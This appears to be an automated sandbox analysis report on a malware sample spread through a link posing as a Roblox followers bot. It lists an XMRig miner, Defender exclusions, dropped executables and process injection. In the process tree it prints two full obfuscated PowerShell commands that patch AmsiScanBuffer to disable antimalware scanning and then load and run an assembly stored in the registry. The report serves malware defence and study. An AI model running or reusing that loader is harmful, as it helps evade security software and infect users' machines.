Analysis
max time kernel: 335s
max time network: 331s
platform: windows10-ltsc 2021_x64
resource: win10ltsc2021-20241023-en
resource tags: arch:x64, arch:x86, image:win10ltsc2021-20241023-en, locale:en-us, os:windows10-ltsc 2021-x64, system
submitted: 27/10/2024, 11:41
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://bit.ly/followersbot_rblx
Resource: win10ltsc2021-20241023-en
General
Target: https://bit.ly/followersbot_rblx
Malware Config
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description            pid   Process         procid_target
PID 1784 created 600   1784  powershell.EXE  5
PID 5400 created 600   5400  powershell.EXE  5
PID 7068 created 600   7068  powershell.EXE  5
PID 5664 created 600   5664  powershell.EXE  5
PID 3464 created 5688  3464  svchost.exe     237
Xmrig family
XMRig Miner payload 7 IoCs
resource                                                                     yara_rule
behavioral1/memory/760-649-0x0000000140000000-0x0000000140835000-memory.dmp  xmrig
behavioral1/memory/760-642-0x0000000140000000-0x0000000140835000-memory.dmp  xmrig
behavioral1/memory/760-648-0x0000000140000000-0x0000000140835000-memory.dmp  xmrig
behavioral1/memory/760-647-0x0000000140000000-0x0000000140835000-memory.dmp  xmrig
behavioral1/memory/760-643-0x0000000140000000-0x0000000140835000-memory.dmp  xmrig
behavioral1/memory/760-646-0x0000000140000000-0x0000000140835000-memory.dmp  xmrig
behavioral1/memory/760-645-0x0000000140000000-0x0000000140835000-memory.dmp  xmrig
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid   Process
2092  powershell.exe
6108  powershell.exe
5696  powershell.exe
4788  powershell.exe
1784  powershell.EXE
5400  powershell.EXE
7068  powershell.EXE
5664  powershell.EXE
Creates new service(s) 2 TTPs
Executes dropped EXE 14 IoCs
pid   Process
5904  9SHCODL.exe
6088  9SHCODL.exe
2356  tonbcjgtfgwe.exe
2408  A9LDCODL.exe
5276  A9LDCODL.exe
5816  A9LDCODL.exe
5708  9SHCODL.exe
1788  9SHCODL.exe
7144  A9LDCODL.exe
4924  A9LDCODL.exe
6592  tonbcjgtfgwe.exe
5688  A9LDCODL.exe
4376  A9LDCODL.exe
1072  A9LDCODL.exe
Loads dropped DLL 64 IoCs
Drops file in System32 directory 15 IoCs
description                   ioc                                                                                                                    Process
File created                  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log                  powershell.exe
File opened for modification  C:\Windows\System32\Tasks\dialersvc64                                                                                  svchost.exe
File opened for modification  C:\Windows\system32\MRT.exe                                                                                            tonbcjgtfgwe.exe
File opened for modification  C:\Windows\system32\MRT.exe                                                                                            9SHCODL.exe
File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  powershell.EXE
File opened for modification  C:\Windows\system32\MRT.exe                                                                                            9SHCODL.exe
File created                  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  powershell.exe
File opened for modification  C:\Windows\system32\MRT.exe                                                                                            tonbcjgtfgwe.exe
File opened for modification  C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749  svchost.exe
File opened for modification  C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157  svchost.exe
File opened for modification  C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506  svchost.exe
File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  powershell.exe
File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  powershell.EXE
File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  powershell.EXE
File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  powershell.EXE
Suspicious use of SetThreadContext 10 IoCs
description                          pid   Process           procid_target
PID 5904 set thread context of 5532  5904  9SHCODL.exe       143
PID 2356 set thread context of 6048  2356  tonbcjgtfgwe.exe  171
PID 2356 set thread context of 6104  2356  tonbcjgtfgwe.exe  172
PID 2356 set thread context of 760   2356  tonbcjgtfgwe.exe  173
PID 1784 set thread context of 5368  1784  powershell.EXE    176
PID 5400 set thread context of 3700  5400  powershell.EXE    178
PID 5708 set thread context of 6472  5708  9SHCODL.exe       207
PID 6592 set thread context of 6268  6592  tonbcjgtfgwe.exe  230
PID 7068 set thread context of 5312  7068  powershell.EXE    233
PID 5664 set thread context of 3340  5664  powershell.EXE    234
resource                                                                     yara_rule
behavioral1/memory/760-636-0x0000000140000000-0x0000000140835000-memory.dmp  upx
behavioral1/memory/760-649-0x0000000140000000-0x0000000140835000-memory.dmp  upx
behavioral1/memory/760-642-0x0000000140000000-0x0000000140835000-memory.dmp  upx
behavioral1/memory/760-648-0x0000000140000000-0x0000000140835000-memory.dmp  upx
behavioral1/memory/760-647-0x0000000140000000-0x0000000140835000-memory.dmp  upx
behavioral1/memory/760-643-0x0000000140000000-0x0000000140835000-memory.dmp  upx
behavioral1/memory/760-641-0x0000000140000000-0x0000000140835000-memory.dmp  upx
behavioral1/memory/760-639-0x0000000140000000-0x0000000140835000-memory.dmp  upx
behavioral1/memory/760-646-0x0000000140000000-0x0000000140835000-memory.dmp  upx
behavioral1/memory/760-645-0x0000000140000000-0x0000000140835000-memory.dmp  upx
behavioral1/memory/760-640-0x0000000140000000-0x0000000140835000-memory.dmp  upx
behavioral1/memory/760-637-0x0000000140000000-0x0000000140835000-memory.dmp  upx
Drops file in Program Files directory 2 IoCs
description                   ioc                                                                                                   Process
File created                  C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\2b12a2bb-9197-427f-bdee-328153f6caeb.tmp  setup.exe
File opened for modification  C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241027114144.pma                       setup.exe
Launches sc.exe 26 IoCs
Sc.exe is a Windows utility to control services on the system.
pid (all sc.exe): 1168, 3524, 5152, 5604, 5196, 648, 5920, 6028, 5032, 704, 5944, 880, 4520, 5160, 4492, 2664, 6972, 6464, 4988, 5432, 4684, 3632, 5984, 6648, 2888, 3052
Detects Pyinstaller 1 IoCs
resource                                        yara_rule
behavioral1/files/0x0002000000043e3d-1515.dat  pyinstaller
Checks processor information in registry 2 TTPs 9 IoCs
Processor information is often read in order to detect sandboxing environments.
description           ioc                                                                              Process
Key opened            \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                 wmiprvse.exe
Key security queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                 wmiprvse.exe
Key value queried     \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information  wmiprvse.exe
Key opened            \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0                 WerFault.exe
Key queried           \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                 wmiprvse.exe
Key value queried     \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  wmiprvse.exe
Key value queried     \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier      wmiprvse.exe
Key value queried     \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz            WerFault.exe
Key value queried     \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  WerFault.exe
Delays execution with timeout.exe 2 IoCs
pid   Process
3564  timeout.exe
2368  timeout.exe
Enumerates system info in registry 2 TTPs 5 IoCs
description        ioc                                                            Process
Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS             msedge.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  msedge.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName   msedge.exe
Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS             WerFault.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU   WerFault.exe
description       ioc                                                                                                                                                                            Process
Set value (int)   \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"                                  Explorer.EXE
Set value (str)   \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"                                Explorer.EXE
Set value (data)  \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\88c34bd0_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\3 = 04000000000000000000803f000000000000000000000000  svchost.exe
Set value (data)  \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\88c34bd0_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\4 = 0420000000000000180000000000000000000000000000000000803f0000803f  svchost.exe
Set value (data)  \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\88c34bd0_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\5 = 0b0000000000000000000000000000000000000000000000  svchost.exe
Modifies data under HKEY_USERS 64 IoCs
Modifies registry class 27 IoCs
Opens file in notepad (likely ransom note) 4 IoCs
pid   Process
240   NOTEPAD.EXE
4436  NOTEPAD.EXE
7064  NOTEPAD.EXE
1736  NOTEPAD.EXE
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid   Process
3536  Explorer.EXE
3256  taskhostw.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid   Process
4660  msedge.exe (x8)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of FindShellTrayWindow 40 IoCs
Suspicious use of SendNotifyMessage 64 IoCs
Suspicious use of SetWindowsHookEx 24 IoCs
pid   Process
752   OpenWith.exe (x3)
3616  OpenWith.exe
4988  OpenWith.exe (x3)
3536  Explorer.EXE (x12)
4924  A9LDCODL.exe
3536  Explorer.EXE (x2)
2408  A9LDCODL.exe
4924  A9LDCODL.exe
Suspicious use of UnmapMainImage 4 IoCs
pid   Process
2636  svchost.exe
2536  RuntimeBroker.exe
3716  RuntimeBroker.exe
3536  Explorer.EXE
Suspicious use of WriteProcessMemory 64 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
Each entry gives the image path, the command line, the nesting level in the tree (1 = top level, 2 = child of the nearest level-1 entry above it, and so on) and the PID; the bullets under an entry are the signatures that process triggered.
C:\Windows\system32\winlogon.exe  (cmdline: winlogon.exe)  level 1  PID:600
C:\Windows\system32\dwm.exe  (cmdline: "dwm.exe")  level 2  PID:1036
C:\Windows\System32\dllhost.exe  (cmdline: C:\Windows\System32\dllhost.exe /Processid:{1eaf5f63-d604-464a-bcac-c2536bd526c0})  level 2
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5368
C:\Windows\System32\dllhost.exe  (cmdline: C:\Windows\System32\dllhost.exe /Processid:{5bacf96c-67db-4c19-9a07-6b84bce6b458})  level 2  PID:3700
C:\Windows\System32\dllhost.exe  (cmdline: C:\Windows\System32\dllhost.exe /Processid:{844601dd-43a6-4ada-ac04-3f4917639d60})  level 2  PID:5312
C:\Windows\System32\dllhost.exe  (cmdline: C:\Windows\System32\dllhost.exe /Processid:{41a3914e-4c27-4356-b8f7-21113d07cebe})  level 2  PID:3340
C:\Windows\system32\lsass.exe  (cmdline: C:\Windows\system32\lsass.exe)  level 1  PID:676
C:\Windows\system32\svchost.exe  (cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM)  level 1  PID:944
C:\Windows\System32\svchost.exe  (cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts)  level 1  PID:392
C:\Windows\System32\svchost.exe  (cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog)  level 1  PID:396
C:\Windows\System32\svchost.exe  (cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService)  level 1  PID:632
C:\Windows\system32\svchost.exe  (cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc)  level 1  PID:864
C:\Windows\system32\svchost.exe  (cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc)  level 1  PID:1068
C:\Windows\system32\svchost.exe  (cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi)  level 1  PID:1092
C:\Windows\system32\svchost.exe  (cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp)  level 1  PID:1192
C:\Windows\system32\svchost.exe  (cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule)  level 1
- Drops file in System32 directory
PID:1264
C:\Windows\system32\taskhostw.exe  (cmdline: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E})  level 2
- Suspicious behavior: GetForegroundWindowSpam
PID:3256
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:QhImxjyKWUtT{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hVgsrERefJVIGM,[Parameter(Position=1)][Type]$PtfHVZUDZd)$rcUIbefiASF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'flec'+'t'+''+'e'+'d'+'D'+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+'a'+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+''+'e'+'m'+[Char](111)+''+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+'y'+''+[Char](112)+''+'e'+'',''+[Char](67)+''+'l'+'a'+[Char](115)+'s'+','+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+'S'+'e'+''+[Char](97)+'l'+[Char](101)+''+'d'+''+[Char](44)+'A'+[Char](110)+'s'+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s',[MulticastDelegate]);$rcUIbefiASF.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+'e'+'c'+[Char](105)+''+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+','+'P'+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$hVgsrERefJVIGM).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$rcUIbefiASF.DefineMethod('I'+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+'bl'+[Char](105)+'c'+[Char](44)+'H
'+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+'g'+''+[Char](44)+'N'+'e'+''+[Char](119)+'Slo'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+'',$PtfHVZUDZd,$hVgsrERefJVIGM).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+'e'+[Char](100)+'');Write-Output $rcUIbefiASF.CreateType();}$haMKgsdSFTRfD=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+[Char](109)+'.'+'d'+''+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+'r'+''+[Char](111)+'s'+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+'e'+''+[Char](77)+''+'e'+'t'+'h'+''+[Char](111)+'d'+[Char](115)+'');$miJwkyurBBmZzv=$haMKgsdSFTRfD.GetMethod('G'+[Char](101)+''+'t'+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+','+[Char](83)+''+'t'+''+'a'+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$MCEMcUxEndYtGJnfutR=QhImxjyKWUtT @([String])([IntPtr]);$WWvOXsWMgytOsqhnblTFBk=QhImxjyKWUtT 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JNnwUqbiAGV=$haMKgsdSFTRfD.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+'e'+'H'+''+[Char](97)+''+[Char](110)+'dle').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+'e'+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$MpDQEUBzVmeZsX=$miJwkyurBBmZzv.Invoke($Null,@([Object]$JNnwUqbiAGV,[Object](''+[Char](76)+'oa'+[Char](100)+''+[Char](76)+'i'+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+'y'+''+[Char](65)+'')));$WisoKjmviHUuuPssW=$miJwkyurBBmZzv.Invoke($Null,@([Object]$JNnwUqbiAGV,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'lP'+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+'c'+''+[Char](116)+'')));$NylEZcZ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MpDQEUBzVmeZsX,$MCEMcUxEndYtGJnfutR).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+'l'+'l'+'');$bZcmgaFQgxxEqstMP=$miJwkyurBBmZzv.Invoke($Null,@([Object]$NylEZcZ,[Object](''+'A'+''+'m'+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+[Char](102)+'f'+[Char](101)+''+[Char](114)+'')));$stXJLHeppg=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WisoKjmviHUuuPssW,$WWvOXsWMgytOsqhnblTFBk).Invoke($bZcmgaFQgxxEqstMP,[uint32]8,4,[ref]$stXJLHeppg);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$bZcmgaFQgxxEqstMP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WisoKjmviHUuuPssW,$WWvOXsWMgytOsqhnblTFBk).Invoke($bZcmgaFQgxxEqstMP,[uint32]8,0x20,[ref]$stXJLHeppg);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+[Char](84)+'W'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+''+'i'+''+[Char](97)+'l'+'e'+''+[Char](114)+'s'+[Char](116)+''+[Char](97)+''+'g'+'e
'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:erecUyBKkUxD{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$cgvWXsDCHZbLGT,[Parameter(Position=1)][Type]$bXKWGCdfKN)$ChuGcCDErKR=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'fl'+'e'+''+[Char](99)+''+'t'+''+[Char](101)+'dD'+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+[Char](101)+'mor'+[Char](121)+'M'+[Char](111)+'d'+[Char](117)+'l'+[Char](101)+'',$False).DefineType('M'+'y'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e'+'T'+''+'y'+''+[Char](112)+'e',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+'li'+'c'+''+[Char](44)+'S'+[Char](101)+'a'+'l'+''+'e'+''+[Char](100)+''+[Char](44)+''+'A'+''+'n'+''+'s'+''+'i'+''+'C'+'la'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+[Char](67)+'l'+'a'+'s'+'s'+'',[MulticastDelegate]);$ChuGcCDErKR.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+'i'+'a'+''+[Char](108)+'Na'+[Char](109)+'e'+','+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+'g'+','+'P'+''+[Char](117)+'bli'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$cgvWXsDCHZbLGT).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$ChuGcCDErKR.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+'c'+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+'S'+[Char](105)+'g,'+'N'+'e
w'+'S'+''+[Char](108)+'ot'+','+'V'+'i'+'r'+'t'+''+'u'+''+[Char](97)+'l',$bXKWGCdfKN,$cgvWXsDCHZbLGT).SetImplementationFlags('R'+'u'+'n'+'t'+''+[Char](105)+'m'+'e'+''+[Char](44)+''+'M'+''+'a'+''+[Char](110)+'a'+'g'+''+'e'+''+[Char](100)+'');Write-Output $ChuGcCDErKR.CreateType();}$ZrqQNGUtvCJil=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+'t'+'e'+'m'+''+[Char](46)+''+[Char](100)+'ll')}).GetType('M'+'i'+''+[Char](99)+''+'r'+''+[Char](111)+'s'+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+[Char](110)+'sa'+'f'+'e'+'N'+'a'+[Char](116)+''+'i'+''+[Char](118)+'eM'+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+'s');$UyIwMnRWFMetix=$ZrqQNGUtvCJil.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+'P'+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+''+[Char](100)+'dr'+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags]('P'+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+'S'+''+[Char](116)+'atic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TPRIERKWTPoyHazJIDh=erecUyBKkUxD @([String])([IntPtr]);$zTGJYCarGFeLJUMHYnbjGP=erecUyBKkUxD 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$OPuhQtqlaYd=$ZrqQNGUtvCJil.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+'od'+[Char](117)+'l'+'e'+''+'H'+''+[Char](97)+''+'n'+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'ne'+'l'+''+[Char](51)+''+'2'+'.'+'d'+''+'l'+'l')));$XEcoJPRbXlTNgs=$UyIwMnRWFMetix.Invoke($Null,@([Object]$OPuhQtqlaYd,[Object]('L'+[Char](111)+''+'a'+''+[Char](100)+'L'+[Char](105)+''+[Char](98)+''+[Char](114)+'a'+[Char](114)+''+'y'+''+[Char](65)+'')));$kqwYXhPMqdADFvAjN=$UyIwMnRWFMetix.Invoke($Null,@([Object]$OPuhQtqlaYd,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+'l'+'P'+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+'c'+[Char](116)+'')));$TLCpCfA=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XEcoJPRbXlTNgs,$TPRIERKWTPoyHazJIDh).Invoke(''+[Char](97)+''+'m'+'s'+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+'l');$PMQjRqMgBzukPdxFW=$UyIwMnRWFMetix.Invoke($Null,@([Object]$TLCpCfA,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'iS'+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+'f'+''+'f'+'e'+[Char](114)+'')));$lhgbXNAFkV=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kqwYXhPMqdADFvAjN,$zTGJYCarGFeLJUMHYnbjGP).Invoke($PMQjRqMgBzukPdxFW,[uint32]8,4,[ref]$lhgbXNAFkV);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$PMQjRqMgBzukPdxFW,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kqwYXhPMqdADFvAjN,$zTGJYCarGFeLJUMHYnbjGP).Invoke($PMQjRqMgBzukPdxFW,[uint32]8,0x20,[ref]$lhgbXNAFkV);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+'T'+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+'i'+[Char](97)+'l'+[Char](101)+'r'+'s'+''+[Char](116)+''+'a'+''+'g'+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5400 -
C:\Windows\System32\Conhost.exe  (cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1)  level 3  PID:5192
-
-
-
